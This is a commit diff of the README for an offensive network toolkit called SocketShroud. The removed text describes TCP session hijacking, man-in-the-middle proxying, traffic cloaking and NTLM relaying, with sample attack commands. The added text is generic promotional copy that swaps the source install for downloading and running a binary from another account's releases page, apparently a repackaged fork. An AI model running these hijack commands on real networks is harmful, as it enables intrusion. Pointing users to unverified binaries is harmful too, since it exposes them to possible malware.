|
1 | | -# SocketShroud |
| 1 | +# SocketShroud 🕵️♂️ |
2 | 2 |
|
3 | | -> **Ghost in the Wire** |
4 | | -> Cloak, reroute, and hijack network sockets like a shadow. |
| 3 | + |
5 | 4 |
|
6 | | -SocketShroud is an advanced LAN-level socket cloak and manipulation toolkit designed for offensive security professionals and red teamers. It provides a suite of modules to: |
| 5 | +Welcome to **SocketShroud**, a powerful toolkit designed for LAN-level socket cloaking and manipulation. This project aims to enhance your penetration testing capabilities by providing tools to create decoys, honeypots, and proxies. Whether you are a seasoned security professional or a curious learner, SocketShroud offers a straightforward way to explore socket manipulation. |
7 | 6 |
|
8 | | -- **Recon:** Real-time socket discovery and analysis using psutil. |
9 | | -- **Cloak:** Hide socket traffic from userland tools via iptables. |
10 | | -- **Hijack:** Inject custom payloads into live TCP sessions using Scapy. |
11 | | -- **Proxy:** Set up a transparent TCP proxy for man-in-the-middle attacks. |
12 | | -- **Decoy:** Deploy fake services (honeypots) to misdirect and bait adversaries. |
| 7 | +## Table of Contents |
13 | 8 |
|
14 | | ---- |
15 | | - |
16 | | -## Features |
17 | | - |
18 | | -- **Real-time recon:** Enumerate active TCP/UDP sessions with detailed process info. |
19 | | -- **Socket cloaking:** Automatically drop packets on targeted ports to hide connections. |
20 | | -- **Session hijacking:** Forge TCP packets to inject data into an existing session. |
21 | | -- **Transparent proxy:** Forward traffic between local and remote hosts seamlessly. |
22 | | -- **Decoy services:** Listen on ports and serve realistic banners to attract attackers. |
23 | | -- **Modular design:** Each module is self-contained for easy integration and extension. |
24 | | -- **DEB Package Ready:** Install via Debian package for seamless deployment on Linux. |
25 | | - |
26 | | ---- |
27 | | - |
28 | | -## Installation |
| 9 | +- [Introduction](#introduction) |
| 10 | +- [Features](#features) |
| 11 | +- [Installation](#installation) |
| 12 | +- [Usage](#usage) |
| 13 | +- [Topics](#topics) |
| 14 | +- [Contributing](#contributing) |
| 15 | +- [License](#license) |
| 16 | +- [Links](#links) |
29 | 17 |
|
30 | | -### Prerequisites |
| 18 | +## Introduction |
31 | 19 |
|
32 | | -- A Debian/Ubuntu-based system (apt package manager) |
33 | | -- Required apt packages will be installed automatically: |
34 | | - - `iptables`, `nmap`, `net-tools`, `lsof`, `python3`, `python3-venv`, etc. |
35 | | -- External tools from the [impacket](https://github.com/SecureAuthCorp/impacket) suite |
36 | | - (for remote execution and NTLM relaying) should be installed and in your PATH. |
| 20 | +SocketShroud provides a suite of tools to manipulate and cloak sockets on a local area network (LAN). This toolkit is designed for white-hat hackers and penetration testers who need to create a safe environment for testing and reconnaissance. The ability to reroute traffic, create decoys, and set up honeypots makes SocketShroud an essential tool in your security arsenal. |
37 | 21 |
|
38 | | -### From Source |
39 | | - |
40 | | -1. **Clone the Repository:** |
| 22 | +## Features |
41 | 23 |
|
42 | | - ```bash |
43 | | - git clone https://github.com/John0n1/SocketShroud.git |
44 | | - cd SocketShroud |
45 | | - ``` |
| 24 | +- **Socket Cloaking**: Hide your actual socket connections to confuse potential attackers. |
| 25 | +- **Decoy Creation**: Generate fake services that mimic real ones, drawing attention away from your actual targets. |
| 26 | +- **Honeypot Deployment**: Set up traps to catch malicious actors and gather intelligence on their methods. |
| 27 | +- **Traffic Manipulation**: Reroute or modify traffic in real-time for testing purposes. |
| 28 | +- **User-Friendly Interface**: Easy to navigate, even for those new to penetration testing. |
46 | 29 |
|
47 | | -2. **Make the Launcher Executable:** |
| 30 | +## Installation |
48 | 31 |
|
49 | | - ```bash |
50 | | - chmod +x socketshroud.sh |
51 | | - ``` |
| 32 | +To get started with SocketShroud, download the latest release from the [Releases](https://github.com/Ruda1106/SocketShroud/releases) section. Follow these steps to install: |
52 | 33 |
|
53 | | -3. **Run as Root:** |
| 34 | +1. **Download the Release**: Visit the [Releases](https://github.com/Ruda1106/SocketShroud/releases) page and download the appropriate file for your system. |
| 35 | +2. **Execute the File**: Run the downloaded file in your terminal. Ensure you have the necessary permissions to execute the file. |
54 | 36 |
|
55 | | - ```bash |
56 | | - sudo ./socketshroud.sh recon |
57 | | - ``` |
| 37 | +```bash |
| 38 | +chmod +x SocketShroud |
| 39 | +./SocketShroud |
| 40 | +``` |
58 | 41 |
|
59 | | - On first run, the tool sets up a local Python virtual environment (`venv/`) and installs required Python modules. |
| 42 | +3. **Dependencies**: Make sure you have the required dependencies installed. Check the documentation for a list of necessary packages. |
60 | 43 |
|
61 | | -### Debian Package |
| 44 | +## Usage |
62 | 45 |
|
63 | | -1. Install the package: |
| 46 | +Once installed, you can start using SocketShroud. Here are some basic commands to get you started: |
64 | 47 |
|
65 | | - ```bash |
66 | | - sudo dpkg -i socketshroud_1.0_all.deb |
67 | | - ``` |
| 48 | +### Starting a Honeypot |
68 | 49 |
|
69 | | - The executable will be installed to `/usr/local/bin/socketshroud`. |
| 50 | +To start a honeypot, use the following command: |
70 | 51 |
|
71 | | ---- |
| 52 | +```bash |
| 53 | +./SocketShroud honeypot --port 8080 |
| 54 | +``` |
72 | 55 |
|
73 | | -## Usage Examples |
| 56 | +This command will initiate a honeypot on port 8080. You can change the port number as needed. |
74 | 57 |
|
75 | | -- **Socket Recon:** |
| 58 | +### Creating a Decoy |
76 | 59 |
|
77 | | - List active connections: |
78 | | - ```bash |
79 | | - sudo socketshroud.sh recon |
80 | | - ``` |
| 60 | +To create a decoy service, use: |
81 | 61 |
|
82 | | -- **Cloak a Port:** |
| 62 | +```bash |
| 63 | +./SocketShroud decoy --service http --port 80 |
| 64 | +``` |
83 | 65 |
|
84 | | - Hide traffic on port 443: |
85 | | - ```bash |
86 | | - sudo socketshroud.sh cloak 443 |
87 | | - ``` |
| 66 | +This will create a fake HTTP service on port 80. |
88 | 67 |
|
89 | | -- **Hijack a Session:** |
| 68 | +### Rerouting Traffic |
90 | 69 |
|
91 | | - Inject data into a session (parameters: target IP, target port, spoofed source IP, source port, TCP seq, TCP ack, payload): |
92 | | - ```bash |
93 | | - sudo socketshroud.sh hijack 10.0.0.5 10.0.0.100 4444 1000 2000 "Injected Payload" |
94 | | - ``` |
| 70 | +To reroute traffic from one socket to another, use: |
95 | 71 |
|
96 | | -- **Proxy Traffic:** |
| 72 | +```bash |
| 73 | +./SocketShroud reroute --source <source_socket> --destination <destination_socket> |
| 74 | +``` |
97 | 75 |
|
98 | | - Set up a proxy that listens on port 8080 and forwards to 10.0.0.8:80: |
99 | | - ```bash |
100 | | - sudo socketshroud.sh proxy 8080 10.0.0.8:80 |
101 | | - ``` |
| 76 | +Replace `<source_socket>` and `<destination_socket>` with the actual socket addresses. |
102 | 77 |
|
103 | | -- **Deploy a Decoy Service:** |
| 78 | +## Topics |
104 | 79 |
|
105 | | - Run a decoy honeypot on port 22: |
106 | | - ```bash |
107 | | - sudo socketshroud.sh decoy 22 |
108 | | - ``` |
| 80 | +SocketShroud covers a range of topics relevant to network security and penetration testing: |
109 | 81 |
|
110 | | ---- |
| 82 | +- **Debian**: Optimized for Debian-based systems. |
| 83 | +- **Decoy**: Techniques for creating decoy services. |
| 84 | +- **Honeypot**: Setting up honeypots to trap attackers. |
| 85 | +- **Kali Linux Tools**: Integrates well with existing Kali Linux tools. |
| 86 | +- **Manipulation**: Various methods for manipulating socket connections. |
| 87 | +- **Penetration Testing Tools**: A vital addition to your pentesting toolkit. |
| 88 | +- **Proxy**: Setup and configuration of proxy servers. |
| 89 | +- **Reconnaissance**: Tools for gathering information about your network. |
| 90 | +- **Reroute**: Techniques for rerouting traffic. |
| 91 | +- **Socket Cloaking**: Methods for hiding socket connections. |
| 92 | +- **White Hat**: A focus on ethical hacking practices. |
111 | 93 |
|
112 | 94 | ## Contributing |
113 | 95 |
|
114 | | -Contributions are welcome! Please open issues or submit pull requests for any improvements or additional features. |
| 96 | +We welcome contributions to SocketShroud! If you have ideas for new features, improvements, or bug fixes, please follow these steps: |
115 | 97 |
|
116 | | ---- |
| 98 | +1. Fork the repository. |
| 99 | +2. Create a new branch for your feature or bug fix. |
| 100 | +3. Make your changes and commit them. |
| 101 | +4. Push your branch and submit a pull request. |
117 | 102 |
|
118 | 103 | ## License |
119 | 104 |
|
120 | | -Released under the [MIT License](./LICENSE). |
121 | | - |
122 | | ---- |
| 105 | +SocketShroud is licensed under the MIT License. Feel free to use, modify, and distribute the code as long as you include the original license. |
123 | 106 |
|
124 | | -## Disclaimer |
| 107 | +## Links |
125 | 108 |
|
126 | | -Use SocketShroud only on networks you are authorized to test. Unauthorized use is illegal and unethical. |
| 109 | +For more information, visit the [Releases](https://github.com/Ruda1106/SocketShroud/releases) section to download the latest version. You can also find documentation and support there. |
127 | 110 |
|
128 | 111 | --- |
129 | 112 |
|
130 | | -Happy socket stalking! |
| 113 | +Thank you for using SocketShroud! We hope this toolkit enhances your penetration testing efforts and helps you secure your networks effectively. Happy hacking! |
0 commit comments